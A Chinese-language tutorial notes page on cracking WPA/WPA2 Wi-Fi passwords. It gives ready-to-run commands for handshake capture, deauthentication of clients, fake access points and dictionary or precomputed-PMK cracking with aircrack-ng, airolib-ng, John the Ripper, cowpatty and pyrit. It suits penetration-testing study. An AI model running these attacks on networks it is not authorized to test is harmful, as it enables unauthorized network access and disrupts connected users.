前言

本节学习对WPA的攻击
主要有PSK攻击和AIROLIB、JTR、cowpatty、pyrit等工具的使用

1、WPA PSK攻击

• WPA不存在WEP的弱点
• 只能基于字典暴力破解

PSK破解过程

• 启动monitor
• 抓包并保存
• deauthentication攻击获取4步握手信息
• 字典暴力破解

实践

AP设置为WPA，AES加密

airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wpa wlan0mon 
#抓包，-c指定信道，--bssid指定侦听的AP，-w写入wpa文件
aireplay-ng -0 2 -a EC:26:CA:DC:29:B6 -c 68:3E:34:30:0F:AA wlan0mon 
#deauthentication攻击让他重连，来尽可能多的抓包，-0指定攻击次数，-a指定AP，-c指定客户端
#成功抓取握手信息
aircrack-ng -w /usr/share/john/password.lst wpa-01.cap
#用自带字典暴力破解，还有以下这些
#/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/
#/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/
#/usr/share/wordlists/rockyou.txt.gz

2、无AP情况下的WPA密码破解

• 启动monitor
• 抓包并保存
• 根据probe信息伪造相同ESSID的AP
• 获取4步握手信息的前两个包
• 字典暴力破解

实践

tmux分窗
窗口1 伪装AP，下面二选一

airbase-ng --essid leon -c 11 -z 2 wlan0mon #伪装AP，-z 2指定TKIP，即WPA1
airbase-ng --essid leon -c 11 -Z 4 wlan0mon #伪装AP，-Z 4指定WPA2

窗口2 侦听抓包

airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wpa wlan0mon #-c指定信道，--bssid指定侦听的AP，-w写入wpa文件

进行密码破解

aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap #wpa这个文件就是抓包，可以用wireshark打开看看
#这时未成功连接，只有前面两个包，有可能破解不了

3、AIROLIB破解密码

原理

• 计算生成不变的PMK
• PMK在破解阶段用于计算PTK
• 通过完整性摘要值破解密码
• SQLite3数据库存储数据

实践

echo kifi > essid.txt
airolib-ng db --import essid essid.txt #创建数据库db
airolib-ng db --stats #当前数据库状态
airolib-ng db --import passwd /usr/share/wordlists/rockyou.txt #导入密码
airolib-ng db --batch #批处理，计算出PMK
aircrack-ng -r db wpa-01.cap #破解

4、JTR破解密码

• 基于规则扩展密码字典
• 获取手机号段利用JTR规则增加最后几位数字

配置文件/etc/john/john.conf
vi打开
在[List.Rules:Wordlist]最后
加一段$[0-9]$[0-9]$[0-9]$[0-9]

john --wordlist=yd.txt --rules --stdout #根据yd.txt生成密码字典
john --wordlist=yd.txt --rules --stdout | aircrack-ng -e kifi -w - wpa-01.cap #破解，-w -指定前面输出的内容	

5、cowpatty破解密码

• WPA通用破解工具，多平台

（1）密码字典破解

cowpatty -r wpa-01.cap -f /usr/share/john/password.lst -s kifi #用密码字典

（2）PMK破解

genpmk -f /usr/share/john/password.lst -d pmkhash -s kifi #生成PMK
cowpatty -r wpa-01.cap -d pmkhash -s kifi #用PMK破解

6、pyrit破解密码

• 与airolib、cowpatty相同，支持基于预计算的PMK提高破解速度
• 除了CPU，还可以用GPU
• 本身支持抓包获取四步握手，无需airodump

pyrit -r wlan0mon -o wpapyrit.cap stripLive #抓取WPA四次握手
pyrit -r wpapyrit.cap analyze #对抓来的包进行分析
pyrit -r wpa.cap -o wpapyrit.cap strip #如果是用airodump抓的包，需要转换再分析

（1）密码字典破解

pyrit -r wpapyrit.cap -i /usr/share/john/password.lst -b EC:26:CA:DC:29:B6 attack passthrough 
#-b指定AP的MAC

（2）数据库模式破解

pyrit eval #查看默认数据库状态
pyrit -i /usr/share/john/password.lst import passwords #导入密码字典
pyrit -e kifi create essid #指定essid
pyrit batch #计算生成PMK，发挥GPU能力
pyrit -r wpapyrit.cap -b EC:26:CA:DC:29:B6 attack db #破解密码

结语

WPA安全性远高于WEP
破解难度高很多
pyrit工具比较好用